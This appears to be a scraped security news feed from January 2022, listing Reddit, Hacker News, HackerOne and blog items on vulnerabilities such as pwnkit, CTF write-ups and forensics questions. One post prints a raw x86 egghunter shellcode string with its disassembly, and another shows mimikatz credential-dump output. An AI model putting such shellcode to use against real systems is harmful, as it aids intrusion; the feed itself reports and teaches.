    Hello, I'm working on creating a tutorial binary exploit for an M1-based Mac. For simplicity and portability I'm using an M1-based Kali VM and trying to use aarch64 shellcraft but getting weird errors, and wondering if anyone has successfully gotten pwn to work for them? Main error message when trying to use asm() on a shellcraft payload is: pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType() Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html but I don't know what binutils arch it's expecting; I tried installing a couple to no avail. Appreciate any of y'all's time, thanks submitted by /u/superiorpyre [link] [comments]  ( 1 min )
    Fuzzing Ethereum Smart Contract using Echidna - Blockchain Security #1
    submitted by /u/pat_ventuzelo [link] [comments]
    Shellcode to x86, x64 Assembly
    Sharing a quick python3 command line tool I made to disassemble shellcode without having to remember the nuances of python2 vs python3 strings and writing to a file each time: https://gitlab.com/stormblest/exploit-dev-tools/-/blob/main/shellcode2asm.py Includes python unittests in Gitlab. Example:
    ```
    $ python3 shellcode2asm.py "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" -a 32
    shellcode: "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"
    00000000 BB90509050 mov ebx,0x50905090
    00000005 31C9       xor ecx,ecx
    00000007 F7E1       mul ecx
    00000009 6681CAFF0F or dx,0xfff
    0000000E 42         inc edx
    0000000F 60         pusha
    00000010 8D5A04     lea ebx,[edx+0x4]
    00000013 B021       mov al,0x21
    00000015 CD80       int 0x80
    00000017 3CF2       cmp al,0xf2
    00000019 61         popa
    0000001A 74ED       jz 0x9
    0000001C 391A       cmp [edx],ebx
    0000001E 75EE       jnz 0xe
    00000020 395A04     cmp [edx+0x4],ebx
    00000023 75E9       jnz 0xe
    00000025 FFE2       jmp edx
    ```
    submitted by /u/blutitanium [link] [comments]  ( 1 min )
  • Open

    Able to steal private files by manipulating response using Auto Reply function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1387320 - Bounty: $2000
    Able to steal private files by manipulating response using Compose Email function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1373784 - Bounty: $2000
    Subdomain Takeover
    Mail.ru disclosed a bug submitted by official_dhivish: https://hackerone.com/reports/1348504
    Cross site scripting via file upload in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by blubluuu: https://hackerone.com/reports/1433125 - Bounty: $500
  • Open

    Watering hole deploys new macOS malware, DazzleSpy, in Asia
    submitted by /u/dmchell [link] [comments]
    Extracting Cobalt Strike Beacon Configurations - Elastic Security Research
    submitted by /u/dmchell [link] [comments]
    RBCD WebClient attack | Franky's WebSite
    submitted by /u/dmchell [link] [comments]
    hlldz/RefleXXion: RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Major Linux PolicyKit security vulnerability uncovered: Pwnkit
    Article URL: https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/ Comments URL: https://news.ycombinator.com/item?id=30077665 Points: 7 # Comments: 0  ( 4 min )
    Rust vulnerability enables attackers to delete files and directories
    Article URL: https://developer-tech.com/news/2022/jan/24/rust-vulnerability-enables-attackers-delete-files-and-directories/ Comments URL: https://news.ycombinator.com/item?id=30072868 Points: 5 # Comments: 1  ( 4 min )
    Dark Souls servers taken down following discovery of critical vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/01/dark-souls-servers-taken-down-following-discovery-of-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30069692 Points: 3 # Comments: 0  ( 2 min )
  • Open

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    submitted by /u/TheSwedishChef24 [link] [comments]
    Mind Your Dependencies: Defending against malicious npm packages
    submitted by /u/SRMish3 [link] [comments]
    We purchased a machine from China and it came with malware preinstalled
    submitted by /u/lormayna [link] [comments]  ( 2 min )
    Cracking Randomly Generated Passwords
    submitted by /u/hyperreality_monero [link] [comments]  ( 1 min )
    RBCD attack & defense. From Domain User to DA on default domain controllers settings. Including webclient service activation
    submitted by /u/k3nfr4 [link] [comments]  ( 1 min )
    Finding vulnerabilities in Swiss Post’s future e-voting system - Part 1
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Recovering redacted information from pixelated videos
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    Solarwinds Web Help Desk: When the Helpdesk is too Helpful
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://seclists.org/oss-sec/2022/q1/80 Comments URL: https://news.ycombinator.com/item?id=30077271 Points: 112 # Comments: 41  ( 5 min )
    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Comments URL: https://news.ycombinator.com/item?id=30075993 Points: 4 # Comments: 2  ( 5 min )
  • Open

    3 tools you absolutely must know for information research
    During a search on the internet, we often come across data formats that at first sight cannot be used directly. Continue reading on Medium »  ( 3 min )
    Python: Speech To Text Conversion
    Simple Python code for converting audio data to text format Continue reading on Medium »  ( 1 min )
    Ukraine: tracking the deployments
    Making sense of the open source intelligence Continue reading on HOW TO STOP FASCISM »
  • Open

    Trainings or Courses or Labs?
    Howdy all, Any idea where I can find the following for Memory Forensics? I’m trying my best to learn the most of Memory Forensics! Have completed the Cyber Defenders lab! Free or Minimal Cost one would be appreciated as I’m just a beginner in my field! Thanks! submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    FTK Imager gets hung
    So I was attempting to take an E01 image of a file server, but it would just get hung right away. For FTK I tried to run it as a logical volume to image it, and still it would get hung. So I used a live boot of Linux and tried to use Guymager and it would just close. It is a RAID 6 I believe. Any other recommendations on how I could take an E01 image of the FS? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 2 min )
    Is the CHFI certification good at a discounted price?
    I have read many posts about EC-Council not being good for any certification. But my question is, if it's offered to me at a discounted price ($99), is it good or still bad? Please note that this cert is being sponsored by my school; although it's not compulsory for me to join, I topped the merit list and they offered me to pay $99 to get its voucher. So shall I go for it or simply decline? submitted by /u/hardfire005 [link] [comments]  ( 2 min )
    Intro to Windows Registry artifacts with TryHackMe Windows Forensics Room.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    How do you think accuracy and precision applies to DFIR?
    I stumbled across accuracy and precision and was wondering how forensic examiners think it applies to DFIR, if at all. Maybe software, artifacts, attribution? Thoughts? https://preview.redd.it/a3xvkvnl1ud81.png?width=1024&format=png&auto=webp&s=d1ff7da688bfb06abfdaea08136cb0924c92c2fc submitted by /u/greyyit [link] [comments]  ( 3 min )
    Recovering deleted/cached images (Mac)
    I have been trying to find ways to recover deleted images from a Discord server, and found that all content is stored in some form in its cache in "~/Library/Application Support/discord/cache". The result is something like this. There seem to be some ways to recover it on Windows; however, is it possible on macOS? I have no idea what I am looking at here, so forgive my ignorance. https://preview.redd.it/brl4u4s2qtd81.png?width=1832&format=png&auto=webp&s=c87beca7931e74351107f7eea57abe24711b073c submitted by /u/Nitrote [link] [comments]  ( 1 min )
    How can I access mmssms.db without rooting phone?
    Hi, I would like to recover some deleted SMS messages. I do not know how to access the mmssms.db when plugging my phone into my PC without actually rooting it. What are my best options? Also, how far back in time do you think I could recover the texts? submitted by /u/prois99 [link] [comments]  ( 1 min )
    Alcatel GO Flip V access?
    No idea where else to ask. There’s an Alcatel Go Flip V that I need text message logs from for a court case. I used to use BitPim for this sort of thing, but that hasn’t had profiles updated for years. I hate to phrase this in such a phone-specific way, but this phone is killing me, and I’ve tried a whole lot: Does anyone know any way to get legible texts from an Alcatel GO Flip V? Or is there anywhere else I should ask? submitted by /u/hmmqzaz [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-25 Review
    2021 Cryptographic Application Technology White Paper by ourren; 2021 Network Detection and Response Report by ourren; 2021 Cyberspace Mapping Annual Report by ourren; Detection Dilemmas and Reflections under the Trend of Fully Encrypted Traffic by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    RESTler: Stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=30073154 Points: 4 # Comments: 0  ( 6 min )
  • Open

    My CRTO course and exam review
    Motivation of The Journey Continue reading on Medium »  ( 4 min )
  • Open

    ClickJackingggg!!
    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking… Continue reading on Medium »  ( 2 min )
  • Open

    Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies
    We observed a new surge of Agent Tesla and Dridex malware samples dropped by malicious Excel add-ins (XLL files). We focus here on Agent Tesla. The post Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies appeared first on Unit42.
  • Open

    Hack into Skynet — Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part 1 of the article, I introduced JSON web tokens: what JWT is and how they are made. I prefer that you take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of online learning during this pandemic — students, researchers have been on a hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate & Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 7 min )
  • Open

    RWCTF 4th Desperate Cat Writeup
    In Real World CTF 4th I had the honour of once again taking part as a challenge author. I wrote a challenge called Desperate Cat, which tests exploitation of a file write into the Tomcat web directory to get a shell under strict constraints.  ( 2 min )
    FreeBuf Morning Report | 1,862 data breach incidents were recorded worldwide last year; Russian authorities arrest the head of an international cybercrime group
    The Australian Securities and Investments Commission (ASIC) announced that it is working with five regtech companies to create a new platform aimed at better handling information on listed companies.  ( 1 min )
    Attack Technique Assessment | Using Safe Mode to Break Through Security Product Defenses
    Researchers at Sophos recently discovered a new ransomware gang called AvosLocker. The attackers evade detection by exploiting the protection gap created when security products cannot run in Safe Mode, and use exception configurations to keep remote control of the target.  ( 1 min )
    Building a web application firewall and traffic inspection with ModSecurity
    ModSecurity is an open-source, cross-platform web application firewall (WAF) engine for Apache, IIS and Nginx, developed by Trustwave's SpiderLabs.  ( 2 min )
    Obtaining Your Master Token in AD FS
    Microsoft's AD FS (federated authentication) service is a cross-boundary identity authentication service designed to let services outside an AD domain authenticate with AD domain accounts, enabling SSO (single sign-on) across multiple different entities or organizations.  ( 1 min )
    Research on Internal Network Proxy Tools and Detection Methods
    Tunneling is a way of passing data between networks using the infrastructure of the internetwork. The data (or payload) carried through a tunnel can be frames or packets of different protocols.  ( 1 min )

  • Open

    What are Sock Puppets And How To Create One?
    Sock puppets are constantly engaging in different ways across social media trying to influence what we think and what we believe. So how to Continue reading on Medium »  ( 3 min )
    Analyze a Twitter query in 5 minutes
    As part of analyzing a competitor's communications or searching for information on social networks, it can be… Continue reading on Medium »  ( 2 min )
    Bundesservice Telekommunikation — unmasked: this intelligence agency is behind it
    Search for one front agency and find three. The simple tricks by which German intelligence agencies can be exposed. Continue reading on Medium »  ( 12 min )
    CyberSoc | Cyber Detective CTF Write Up — Life Online
    OSINT-focused CTF Challenges. OSINT in Twitter, Stego, Crypto and more Continue reading on Medium »  ( 3 min )
    OSINT Tools to Use
    OSINT tools: An expanding list Continue reading on Medium »  ( 14 min )
  • Open

    CVE-2022-0185 in Linux Kernel Can Allow Container Escape in Kubernetes
    Article URL: https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes Comments URL: https://news.ycombinator.com/item?id=30064884 Points: 2 # Comments: 0  ( 4 min )
    CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/4 Comments URL: https://news.ycombinator.com/item?id=30057900 Points: 2 # Comments: 0  ( 5 min )
    CVE-2021-3996 and CVE-2021-3995 in util-Linux's libmount
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/2 Comments URL: https://news.ycombinator.com/item?id=30056823 Points: 3 # Comments: 0  ( 3 min )
  • Open

    Cobalt Strike, a Defender’s Guide - Part 2
    submitted by /u/dmchell [link] [comments]
  • Open

    Using Twitter to notify careless developers — the unorthodox way (Or, how you could use GitHub to compromise 9.5K Twitter accounts without “hacking”)
    submitted by /u/sp00kyphiss [link] [comments]  ( 1 min )
    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    submitted by /u/jrozner [link] [comments]
    WordPress 5.8.2 Stored XSS Vulnerability
    submitted by /u/monoimpact [link] [comments]
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]
    How BRATA is monitoring your bank account | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    TypeScript scenario-based web application Fuzzing Framework, supports genetic algorithm and running on CI
    submitted by /u/hi120ki [link] [comments]
    Private Network Access: introducing preflights - Chrome Developers
    submitted by /u/rhaidiz [link] [comments]
    Qiling Sandbox Escape
    submitted by /u/ly4k_ [link] [comments]
    CVE-2022-0185 – What does the newest kernel exploit mean for Kubernetes
    submitted by /u/gemyougym [link] [comments]  ( 1 min )
  • Open

    How I hacked thousands of subdomains
    Hello everyone Continue reading on Medium »  ( 3 min )
    Hack into Skynet — Real World CTF (2022) walkthrough
    Continue reading on InfoSec Write-ups »  ( 4 min )
    Journey for finding the CSRF Bug lead to the finding of the 403 Forbidden error
    Hello, I'm Manan Aggarwal and this is my first blog post, about how, while I was looking for a CSRF bug, it led to the finding of the 403… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec! Continue reading on InfoSec Write-ups »  ( 2 min )
    deBridge launches bug bounty on ImmuneFi
    This initiative is being funded by deBridge in order to improve network security and reliability for the network’s global community. Continue reading on Medium »  ( 2 min )
    Security Explained: Penetration Testing vs Bug Bounties
    In the world of application and network cybersecurity, you may have asked the question: what is penetration testing? Or what are bug… Continue reading on Medium »  ( 3 min )
  • Open

    Why are serializing bugs not a thing? Does code execution only occur during deserializing data?
    Noticed all the fanfare around deserializing but not the opposite, which is serializing a string and getting code execution from that. submitted by /u/Academic-Discount252 [link] [comments]  ( 2 min )
    Is authenticating by URL secure?
    The idea is to have a desktop .NET app that authenticates a user by having a built-in browser that takes you to an SSO page, and only allows access to the app if you successfully arrive at a URL which is only accessible if you were able to successfully log in. Is this a secure method? I'm worried there is some way of faking a URL. Is there some other alternative similar to this that is more secure, maybe something to do with certificates? I'm very new to this kind of stuff so any help is appreciated. submitted by /u/Sloathe [link] [comments]  ( 1 min )
    Looking to make a VLAN on my Home Network to protect a New Machine
    Two of my devices have had strange occurrences over the last couple of months. I am sure it's fine, but it has been enough that I don't trust them. I have been building a desktop and I am about to finish. My question is how to best keep my new desktop with a fresh install of Windows 10 safe from any possible malware lingering on my other two machines on the network. Would a VLAN be the way to go on something like this? Like set up a VLAN specifically for my desktop. I am new at this stuff so I apologize in advance for any annoying assumptions or questions. Thank you so much for your consideration. EDIT: I also have an unmanaged switch and a Netgear wifi extender/access point at my disposal. My ISP is Xfinity. EDIT: VLAN needs a managed switch so it's a no-go. submitted by /u/Zpointe [link] [comments]  ( 1 min )
    Could other logging systems have similar flaws to log4shell if fuzzed properly?
    The problem with log4shell is it was overblown and very buzzwordy when it relied on a known flaw from years ago called JNDI injection, but I'm thinking bigger than JNDI and Java. Could other programming languages like PHP, Python, Ruby, ASPX/.NET Framework have similar flaws to force their logging system to execute a log as code? Most logging systems don't have fancy features like JNDI, LDAP etc. so I'm not sure what you could leverage to force code to be executed. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    How do I get out?
    Hi all, bit of an unusual one for you - I really want out of cybersecurity. I've got about 3 years of experience in netsec, mostly doing app and infrastructure security testing, and honestly I hate it. Every project is a brand new technology I've got little experience in and I always end up feeling like I couldn't possibly have tested it 100% properly. I have major anxiety and panic issues and I'm finding the entire thing just too stressful and have completely burnt out in a few short years. So my question is: has anyone successfully transitioned into another IT space from cyber security? I would love to just be a sysadmin and only have a single network and set of technologies to contend with, so I can feel like I'll truly master them and become properly proficient. The problem is I think I'll have a lot of stigma going into interviews as it will be very obvious I couldn't handle netsec and am looking for an out, especially considering I'm on £50k and will likely need to take a cut down to £25k-35k to get into a role like this. So any advice anyone can offer for how to approach this situation? Do I need to go get an entirely different set of certs before I'll even be considered? signed, a very burnt out pentester submitted by /u/mekkr_ [link] [comments]  ( 8 min )
    Interview technical test
    Hey guys, I'm interviewing for a jr pen tester position and was asked for a technical test that consists of checking the security of an IP target that is hosted in the AWS cloud. I can use whatever tool I want as long as I find issues in the IP target and recommend ways to solve the issue. I have three days to do this test, and I'm looking to learn whatever I have to learn to take this next step that will change my life forever, but I have no idea how to start. Can you guys point me in the right direction? What resources do I have to start learning that? Thank you, and sorry if this doesn't fall in the scope of the subreddit. submitted by /u/Kelvien [link] [comments]  ( 2 min )
    A HUGE untapped attack surface for auth bypassing: Arbitrary Server Side Forwards, also known as Unvalidated Forwards or Dangerous Forwards. It's basically SSRF-Lite.
    Barely any blogs or posts cover this stuff in enough depth for my liking, and some of the biggest auth bypasses in Java apps stem from their RequestDispatcher forward feature, which allows you to access internal authenticated APIs and endpoints as a non-logged-in session. What I'm wondering is if there's anything analogous to this in other popular languages like PHP, Ruby on Rails, Django etc. to do the same thing, and if not, is there any research regarding auth bypasses for open redirects, which are more client-side based? I don't believe they can be used for auth bypasses, since forwards are internal/server-sided and keep session and parameter data intact, whereas redirects are client-sided and initialize fresh session data, so they seem less useful than forwards. The only time I've seen an open redirect possibly bypass authentication is in combination with an SSRF or some feature where the web app follows the URL and then follows that URL's redirect internally. Would love fellow netsec peeps' insight on this under-researched phenomenon. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Interview Question
    Hi guys, I have an interview for an intern SOC analyst position at a reputed organization, and the interview will include a technical lab as well. Any idea what the lab questions could be? How can I prepare for the lab examination? submitted by /u/Either_Attempt_9108 [link] [comments]  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Movies and series
    submitted by /u/omnifage [link] [comments]
    Dataset and model of the universe
    Gaia is a European space mission providing astrometry, photometry, and spectroscopy of more than 1000 million stars in the Milky Way. Also data for significant samples of extragalactic and Solar system objects is made available. The Gaia Archive contains deduced positions, parallaxes, proper motions, radial velocities, and brightnesses. Complementary information on multiplicity, photometric variability, and astrophysical parameters is provided for a large fraction of sources. http://cdn.gea.esac.esa.int/ Browse to https://gea.esac.esa.int/ for info. submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    Article URL: https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert/ Comments URL: https://news.ycombinator.com/item?id=30060422 Points: 2 # Comments: 0  ( 8 min )
    F5 fixes high-risk Nginx Controller vulnerability in January patch rollout
    Article URL: https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout Comments URL: https://news.ycombinator.com/item?id=30060420 Points: 2 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-01-24 Review
    A First Look at Prototype Pollution in node.js by ourren; 2021 Attack Technique Trends Report by ourren; SecWiki Weekly (Issue 412) by ourren; Research on Internal Network Proxy Tools and Detection Methods by xiahao90; The Hash Game of Hunting Samples by Avenger. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Exfiltration
    I'd like to start a brief discussion that might be a great learning opportunity for a lot of newbie forensic investigators - From a forensics standpoint, how would you tell if a file was exfiltrated? For this scenario, I'm thinking ransomware gang exfiltrates data before encrypting and is using a cloud based solution for storage. submitted by /u/DeadBirdRugby [link] [comments]  ( 3 min )
    Does anyone have experience with /media/0/.RecycleBin? (Android)
    If a file has a creation time and has this location, does this mean the creation time is the time the file was put there? And therefore "deleted"? submitted by /u/DHZX [link] [comments]  ( 1 min )
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    The Past and Present of Security Analytics Technology
    How has security analytics technology changed over the past decade? This article explores the evolution and value of security analytics.  ( 1 min )
    Corporate email accounts of thousands of industrial organizations stolen and abused for the next attack
    Attackers abuse the trust between contacts of corporate mailboxes to launch attacks, spreading from one industrial enterprise to another.  ( 1 min )
    Inside the company they only want to keep a low profile, but their skills won't allow it
    Tophant (斗象科技)'s first internal attack-and-defense exercise concluded successfully.
    Tophant (斗象科技) honored as one of the 2021 Outstanding Cybersecurity Enterprises "Top 10 in Security Services"
    Successfully selected and awarded the title of "Top 10 in Security Services"
    2021 National Mobile Application Security Observation Report
    At present, China's cybersecurity situation remains severe; in the era of big data, cybersecurity faces various hidden dangers such as virus threats, online fraud, hacker intrusions and information loss.  ( 1 min )
    2021 Business Risk Control Insight Report officially released
    An in-depth analysis of typical fraud scenarios and cases in 2021 from the three dimensions of business security, content security and cross-border security.
    FreeBuf Morning Report | Russia's central bank proposes banning cryptocurrency; hackers implant malware into UEFI firmware
    A new survey shows that over the past three years the number of cyberattacks against companies around the world has increased by 15%.  ( 1 min )
    Security Construction and Security Operations under Cloud-Native Architecture, Seen from Major Vulnerability Response (Part 1)
    A summary of emergency response to major vulnerabilities and building security capabilities driven by security operations  ( 1 min )
    A Brief Look at PHP Pseudo-Protocols
    PHP has many wrapper protocols; the most common include the file, php, data, zip and phar protocols, among others.  ( 1 min )
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-33742: Analysis of the Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability
    Author: Topsec Alpha Lab (天融信阿尔法实验室). Original link: https://mp.weixin.qq.com/s/nfPm0B2Z9dTodsw-VTUxpQ 1 Vulnerability background: On 14 July 2021 Google's Threat Analysis Group (TAG) published an article titled "How We Protect Users From 0-Day Attacks". The article disclosed the 2021 Google Thr...
  • Open

    No length on password
    Imgur disclosed a bug submitted by blackfly_: https://hackerone.com/reports/1411363 - Bounty: $250
  • Open

    CVE-2021-33742: Analysis of an Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability
    Contents: 1. Vulnerability background 2. Vulnerability overview 3. Analysis environment 3.1 Extracting the vulnerable module 3.2 Disabling ASLR 4. Reproducing the vulnerability 5. Structure of the Internet Explorer DOM tree 5.1 A text-centric design 5.2 Adding a hierarchy of complexity 5.3 The original DOM was not encapsulated 6. Root-cause analysis 6.1 Reversing the classes in mshtml.dll related to this vulnerability 6.1.1 CSpliceTreeEngine 6.1.2 CTreeNode 6.1.3 CTreePos 6.1.4 CTreeDataPos 6.1.4.1 Tree::TextData 6.1.4.2 CTxtPtr 6.2 The DOM tree corresponding to the PoC 6.3 Analysis of the root cause 7. The fix 8. References. Vulnerability background: On July 14, 2021, Google's Threat Analysis Group (TAG) published an article titled "How We Protect Users From 0-Day Attacks", disclosing details of four in-the-wild 0-day vulnerabilities that TAG discovered in 2021: CVE-2021-21166 and CVE-2021-30551 in Google Chrome, CVE-2021-33742 in Internet Explorer, and CVE-2021-1879 in Apple Safari. In April 2021, TAG discovered a campaign targeting Armenian users in which malicious Office documents invoked Internet Explorer to load a remote malicious web page, exploiting a … in the Internet Explorer rendering engine

  • Open

    mimikatz LogonPasswords and usernames with dollar sign ($) at the end
    I have a lab that I'm testing mimikatz on. Some of the usernames are dumped as "hostname$". What does that mean? hostname being the actual host name of the test server, in this case "labserver"; so it will be something like: [...] kerberos : * Username : labserver$ * Domain : lab.corp * Password : P@ssW0rd!! submitted by /u/ak_z [link] [comments]  ( 1 min )
    [Malware] I've started studying malware and more specifically backdoors, but something seems to not make any sense.
    Hey, I've recently started to study how backdoors work and are used / made. But I've noticed that every backdoor I've come across follows this principle: A client runs on the target and tries to connect to the attacker to give him access. The server runs on the attacker and waits for a connection from the target. Shouldn't this be the opposite so the attacker can gain access whenever he wants? Isn't the purpose of a backdoor to be an easy way for the attacker to come back later? If so doesn't it defeat it? Am I misunderstanding something? I hope someone can help me clarify this. PS: I'm not asking this to commit any sort of crime, I'm genuinely interested in cybersecurity research and that's why I'm asking this question. submitted by /u/fleurdelys- [link] [comments]  ( 2 min )
    Which do you think is the higher tier in cyber security?
    Soc analyst or security analyst? submitted by /u/lowkiwatchingyou [link] [comments]  ( 1 min )
    Weak password found on "accident"
    Backstory for question: I'm currently in the process of getting a job and I was sent a link (via email) to a psychological test which required a username and password to login, the user was already typed for me (sent as a parameter in the url) and the password was sent in the email. At first I didn't read the full email so I entered the link and when I saw I needed a password, I thought that there must've been a mistake, so I typed a "random" password to see what would happen (I typed the same user as the pass) and I was able to log in. I was very confused as I was greeted with a page full of information regarding the account I was logged in to and as I explored further I was able to see personal information regarding other people that have done the quiz. At this point I realized that I wasn't supposed to be able to read this info so I logged out and tried another password (I was thinking that maybe the account accepted everything you typed) but no, I got a "wrong password" text. I read the email again, this time I saw that the password I was supposed to use was always there, I try it and I log in successfully, but now it doesn't redirect me to the admin panel, it takes me to the psych test I'm supposed to be doing. As a NetSec Student, I know that I should let the company know about this weak password, but I don't know how to do it without it looking like I was on purpose trying to log in with another password different than the one provided via email and maybe get in trouble with the company I'm applying to. Worded as a question: What is the best way to let a company know that they have a vulnerability on an account? TL;DR: Got sent user and pass for an account, tried same user as pass instead (because I'm dumb and didn't read full email) and logged in as admin. Want to disclose this to the company but don't want to get in trouble. submitted by /u/Emacholo [link] [comments]  ( 3 min )
    Advice on a DAST Tool to Handle Single Page Apps
    Hi everyone, I’m currently looking for a DAST scanner that works well with single page applications (I’m using Ember.js with a couple of APIs behind it). For example, every tool I’ve tried has not been able to effectively test for XSS, as they can’t link injection points from API calls back to the rendered DOM on the monolithic front end. Any tools, advice, etc. would be so greatly appreciated. Also, please note that I already utilize SCA and SAST, and will be moving to IAST in the future – this is solely about DAST. Cost is not a concern, just effectiveness. submitted by /u/shadowcorp [link] [comments]  ( 1 min )
    Jumping from Application Developer/DevOps to Application Security Engineer
    Hey everyone, I'm 27, relatively new into tech (4 years of experience). I'm a full stack developer, experienced with DevOps and CI/CD pipelines, and I have a CISSP. My goal is to ultimately become a jack of all trades architect. I'm potentially getting an opportunity to move into an application security engineering role that has significantly less development, and a lot more threat modeling, security architecture, pen testing, etc. I've never done those things, I've only studied them. Is it worth it to switch into a much more high level security oriented position? Would I be abandoning my primary skill set? Or is there a way to combine the 2 down the line? I'd love to hear your experience, your advice, and how your own career grew. submitted by /u/pyscho94 [link] [comments]  ( 1 min )
    Strange unknown local device found when running Wireshark and filtering via ARP
    Hi, I apologize in advance if this does not fit this subreddit. I was running wireshark on my home network and was filtering by ARP to test some things. But in the process I found a strange device with a Facebook mac address. https://imgur.com/a/HbNuWdE (note, I removed the mac for the router) It was only the router asking for ip and not vice versa. Why would the router ask for it in the first place? Any info/explanation would be appreciated. submitted by /u/Wattcat [link] [comments]  ( 1 min )
    Career pivot!
    Looking to pivot to the cyber security world. Studying for a Sec+ cert, have a secret clearance, and got a cyber cert from MIT. Have 2 years of DOD consulting experience. And an engineering degree. Looking at roles like "cybersecurity engineer" and cybersecurity analyst. What kind of compensation can I expect as a government contractor with the above resume? I'm looking to get into the RMF/Policy/Vulnerability Assessment world. I am trying to create a future path for myself down the road. submitted by /u/tbrady1001 [link] [comments]  ( 1 min )
    Making the jump from IT Support to Security - Advice needed
    Hello, Looking to move into IT Security from IT Support. I currently have 15+ years in IT Support (1st, 2nd, 3rd line IT support). Unfortunately I'm pretty clueless on progression steps and the certs needed to climb up the Security ladder. I don't like the idea of CISSP as that appears to be geared towards management, but like the look of Security Analysis/Defensive/Offensive. With my IT background what certs should I look at? I was thinking GCIH as a start? Also would 2 years as a Security Analyst with a couple of certs be enough to progress in a new company? Or would 5 years (for example) be the minimum I would realistically need? Any advice/insight would be appreciated and apologies if this is the wrong forum. submitted by /u/ZoidbergsMinions [link] [comments]  ( 5 min )
